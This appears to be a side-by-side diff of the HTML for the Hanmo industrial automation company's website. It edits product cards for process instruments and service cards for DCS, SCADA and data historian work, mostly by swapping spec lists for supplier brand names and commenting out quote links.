<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-water text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-water text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i1.title">Flow Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i1.desc">Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i1.title">Flow Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i1.desc">Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Range: 0-1000 m³/h</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 4-20mA / Pulse output</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> IP67 rated</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Endress+Hauser</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Flownics</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Azbil , Honeywell</div></div>
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div> </div>
</div> </div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-gauge-high text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-gauge-high text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i2.title">Pressure Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i2.desc">Differential and absolute pressure sensors for ultra-high sensitivity</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i2.title">Pressure Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i2.desc">Differential and absolute pressure sensors for ultra-high sensitivity</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Range: -1 to 1000 bar</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ±0.1% accuracy</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ATEX certified</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Azbil</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Honeywell</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Autonics , Endress+Hauser</div></div>
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div> </div>
</div> </div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-thermometer-half text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-thermometer-half text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i3.title">Temperature Sensors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i3.desc">RTD, thermocouple, and infrared temperature measurement</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i3.title">Temperature Sensors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i3.desc">RTD, thermocouple, and infrared temperature measurement</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Range: -50 to +300°C</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ±0.3°C accuracy</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Fast response time</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Autonics</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Azbil</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Honeywell , Endress+Hauser</div></div>
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div> </div>
</div> </div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-fill-drip text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-fill-drip text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i4.title">Level Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i4.desc">Ultrasonic, radar, and capacitive level sensors</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i4.title">Level Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i4.desc">Ultrasonic, radar, capacitive and float level sensors</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Range: 0-30 meters</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ±2mm repeatability</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Dust-proof design</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Endress+Hauser</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Seojin Instec</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Hanil Level</div></div>
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div> </div>
</div> </div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-flask text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-flask text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i5.title">Analytical Sensors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i5.desc">pH, conductivity, oxygen, and dissolved gas analyzers</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i5.title">Analytical Sensors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i5.desc">pH, conductivity, oxygen, and dissolved gas analyzers</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Multi-parameter capability</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Automatic calibration</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Real-time data logging</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Honeywell Analytics</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Toa DKK</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Gastron</div></div>
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div> </div>
</div> </div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-sliders-h text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-faucet text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i6.title">Control Valves</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i6.desc">Smart positioners with HART communication</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i6.title">Control Valves</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i6.desc">Smart positioners with HART communication</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ±0.5% repeatability</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> HART protocol</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Self-tuning algorithm</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Komoto (Motoyama Korea)</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Azbil</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Honeywell</div></div>
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div> </div>
</div> </div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-wave-square text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><svg class="w-16 h-16 text-blue-300 group-hover:text-blue-600 transition-colors"><use href="assets/images/icons/icons.svg#icon-xv"></use></svg></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i7.title">Vibration Monitors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i7.desc">Accelerometers and velocity sensors for predictive maintenance</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i7.title">Shutoff Valves</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i7.desc">Accelerometers and velocity sensors for predictive maintenance</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Frequency: 0-20 kHz</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Wireless capability</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> FFT analysis ready</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Automa</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Proval</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Flowserve</div></div>
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div> </div>
</div> </div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-microchip text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-microchip text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i8.title">Smart Data Loggers</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i8.desc">IoT-enabled data acquisition units with cloud connectivity</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i8.title">Smart Data Loggers</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i8.desc">IoT-enabled data acquisition units with cloud connectivity</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 16-32 analog channels</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 4G/WiFi/Ethernet</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Local data storage</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 16-32 analog channels</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 4G/WiFi/Ethernet</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Local data storage</div></div>
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div> </div>
</div> </div>
</div> </div>
<div class="mt-20 p-12 bg-gradient-to-r from-blue-600 to-blue-700 rounded-[2.5rem] text-white text-center"> <!-- <div class="mt-20 p-12 bg-gradient-to-r from-blue-600 to-blue-700 rounded-[2.5rem] text-white text-center">
<h3 class="text-3xl font-semibold mb-4 font-premium" data-i18n="inst.custom.title">Custom Integration Available</h3> <h3 class="text-3xl font-semibold mb-4 font-premium" data-i18n="inst.custom.title">Custom Integration Available</h3>
<p class="text-white/90 mb-8 max-w-2xl mx-auto font-light" data-i18n="inst.custom.desc">All instruments integrate seamlessly with our DCS and SCADA platforms.</p> <p class="text-white/90 mb-8 max-w-2xl mx-auto font-light" data-i18n="inst.custom.desc">All instruments integrate seamlessly with our DCS and SCADA platforms.</p>
<a href="#contact" class="bg-white text-blue-600 hover:bg-slate-100 px-8 py-3 rounded-2xl font-bold transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="inst.custom.btn">Request Custom Configuration</a> <a href="#contact" class="bg-white text-blue-600 hover:bg-slate-100 px-8 py-3 rounded-2xl font-bold transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="inst.custom.btn">Request Custom Configuration</a>
</div> </div> -->
</div> </div>
</section> </section>
<!-- REFERENCES SECTION --> <!-- REFERENCES SECTION -->
<section id="services" class="py-32 bg-white"> <section id="services" class="py-32 bg-white">
<div class="container mx-auto px-6"> <div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-24"> <div class="text-center max-w-5xl mx-auto mb-8">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="svc.badge">Referenced Plant Varieties</h2> <h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="svc.badge">Referenced Plant Varieties</h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="svc.title">Versatile Automation References</h3> <h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="svc.title">Versatile Process References</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="svc.desc">From Deep Understanding of various industry references to Seamless Execution.</p> <p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="svc.desc">From deep understanding of various industry references to Seamless Execution.</p>
</div> </div>
<div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-8"> <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-8">
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl"> <div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
<div class="h-56 overflow-hidden"><img src="assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" alt="DCS" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div> <div class="h-56 overflow-hidden"><img src="assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" alt="DCS" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
<div class="p-10 flex-grow flex flex-col"> <div class="p-10 flex-grow flex flex-col">
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-network-wired text-blue-600 group-hover:text-white text-xl"></i></div> <div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-2 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-network-wired text-blue-600 group-hover:text-white text-xl"></i></div>
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s1.title">DCS Integration</h4> <h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s1.title">DCS Integration</h4>
<!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flx-grow" data-i18n="svc.s1.desc">Semiconductor Solvent Recovery & Production Plant., 80% Hydragin Plant, SNCR & SCR Envirionmental Plant, etc</p>--> <!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flx-grow" data-i18n="svc.s1.desc">Semiconductor Solvent Recovery & Production Plant., 80% Hydragin Plant, SNCR & SCR Envirionmental Plant, etc</p>-->
<ul class="text-slate-500 text-xs md:text-sm <ul class="text-slate-500 text-xs md:text-sm
@@ -366,13 +415,13 @@
</ul> </ul>
<a href="#dcs" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s1.link">Learn More <i class="fas fa-arrow-right"></i></a> <!-- <a href="#dcs" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s1.link">Learn More <i class="fas fa-arrow-right"></i></a> -->
</div> </div>
</div> </div>
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl"> <div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
<div class="h-56 overflow-hidden"><img src="assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" alt="SCADA" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div> <div class="h-56 overflow-hidden"><img src="assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" alt="SCADA" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
<div class="p-10 flex-grow flex flex-col"> <div class="p-10 flex-grow flex flex-col">
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-chart-line text-blue-600 group-hover:text-white text-xl"></i></div> <div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-2 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-chart-line text-blue-600 group-hover:text-white text-xl"></i></div>
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s2.title">SCADA Design</h4> <h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s2.title">SCADA Design</h4>
<!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s2.desc">Real-time monitoring platforms with advanced HMI and secure remote access protocols.</p>--> <!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s2.desc">Real-time monitoring platforms with advanced HMI and secure remote access protocols.</p>-->
<ul class="text-slate-500 text-xs md:text-sm <ul class="text-slate-500 text-xs md:text-sm
@@ -398,13 +447,13 @@
</li> </li>
</ul> </ul>
<a href="#services" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s2.link">Case Studies <i class="fas fa-arrow-right"></i></a> <!-- <a href="#services" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s2.link">Case Studies <i class="fas fa-arrow-right"></i></a> -->
</div> </div>
</div> </div>
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl"> <div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
<div class="h-56 overflow-hidden"><img src="assets/images/bearing.png" alt="Historian" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div> <div class="h-56 overflow-hidden"><img src="assets/images/bearing.png" alt="Historian" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
<div class="p-10 flex-grow flex flex-col"> <div class="p-10 flex-grow flex flex-col">
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-database text-blue-600 group-hover:text-white text-xl"></i></div> <div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-2 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-database text-blue-600 group-hover:text-white text-xl"></i></div>
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s3.title">Data Historians</h4> <h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s3.title">Data Historians</h4>
<!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s3.desc">Mission-critical SQL infrastructure optimized for massive industrial time-series data storage.</p>--> <!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s3.desc">Mission-critical SQL infrastructure optimized for massive industrial time-series data storage.</p>-->
<ul class="text-slate-500 text-xs md:text-sm <ul class="text-slate-500 text-xs md:text-sm
@@ -433,13 +482,13 @@
<span data-i18n="svc.s3.item4"></span> <span data-i18n="svc.s3.item4"></span>
</li> </li>
</ul> </ul>
<a href="#dbsvr" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s3.link">Data Security <i class="fas fa-arrow-right"></i></a> <!-- <a href="#dbsvr" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s3.link">Data Security <i class="fas fa-arrow-right"></i></a> -->
</div> </div>
</div> </div>
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl"> <div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
<div class="h-56 overflow-hidden"><img src="assets/images/instrument.png" alt="Instruments" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div> <div class="h-56 overflow-hidden"><img src="assets/images/instrument.png" alt="Instruments" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
<div class="p-10 flex-grow flex flex-col"> <div class="p-10 flex-grow flex flex-col">
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-gauge-high text-blue-600 group-hover:text-white text-xl"></i></div> <div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-2 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-gauge-high text-blue-600 group-hover:text-white text-xl"></i></div>
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s4.title">Control Instruments</h4> <h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s4.title">Control Instruments</h4>
<!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s4.desc">Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.</p>--> <!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s4.desc">Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.</p>-->
<ul class="text-slate-500 text-xs md:text-sm <ul class="text-slate-500 text-xs md:text-sm
@@ -476,7 +525,7 @@
<span data-i18n="svc.s4.item6"></span> <span data-i18n="svc.s4.item6"></span>
</li> </li>
</ul> </ul>
<a href="#products" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s4.link">Product Catalog <i class="fas fa-arrow-right"></i></a> <!-- <a href="#products" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s4.link">Product Catalog <i class="fas fa-arrow-right"></i></a> -->
</div> </div>
</div> </div>
</div> </div>
@@ -489,16 +538,16 @@
<div class="grid lg:grid-cols-2 gap-20 items-center"> <div class="grid lg:grid-cols-2 gap-20 items-center">
<div class="relative"> <div class="relative">
<div class="aspect-square rounded-[3rem] overflow-hidden shadow-2xl"><img src="assets/images/ControlRoom7.png" alt="About Hanmo" class="w-full h-full object-cover"></div> <div class="aspect-square rounded-[3rem] overflow-hidden shadow-2xl"><img src="assets/images/ControlRoom7.png" alt="About Hanmo" class="w-full h-full object-cover"></div>
<div class="absolute -bottom-10 -right-10 p-10 bg-blue-600 text-white rounded-[2rem] shadow-2xl max-w-xs"> <div class="absolute -bottom-10 -right-10 p-8 bg-blue-600 text-white rounded-[2rem] shadow-2xl max-w-xs">
<div class="text-6xl font-extralight mb-4 font-premium">20+</div> <div class="text-6xl font-extralight mb-4 font-premium">20+</div>
<div class="text-xs font-bold uppercase tracking-widest leading-loose" data-i18n="about.years">Years of Industrial Excellence</div> <div class="text-xs font-bold uppercase tracking-widest leading-loose" data-i18n="about.years">Years of Industrial Excellence</div>
</div> </div>
</div> </div>
<div class="pt-10"> <div class="mt-10">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="about.badge">About Hanmo</h2> <h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="about.badge">About Hanmo</h2>
